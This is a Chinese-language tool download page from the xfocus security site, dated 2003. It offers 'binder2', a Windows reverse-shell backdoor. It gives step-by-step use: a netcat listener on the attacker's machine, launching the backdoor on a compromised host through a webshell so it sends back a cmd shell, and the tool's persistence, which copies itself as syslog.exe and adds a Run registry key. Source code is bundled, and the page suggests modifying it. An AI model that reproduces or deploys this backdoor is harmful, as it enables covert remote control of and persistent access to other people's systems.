xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加工具English Version

binder2.rar


提交时间:2003-07-24
提交用户:lw
工具分类:后门程序
运行平台:Windows
工具大小:12016 Bytes
文件MD5 :1e53ccf0083c2ceaf186ac689c06802a
工具来源:http://haowawa.8866.org

binder2.exe 反弹式后门程序
简介:  
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.

用法:

1. 在本地机器监听一个端口:

netcat -vv -l -p 80

2. 通过webShell或是别的什么运行后门:

binder2 80 youIPadd

3. 本地监听端口将截获一个来自远程主机的cmd.

注意:

程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358.
程序会复制自身到c:\winnt\下名为syslog.exe,并在
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)

压缩包中含源码,建议按需更改代码后使用.

Code by threat. THX! :)

>> 下载 <<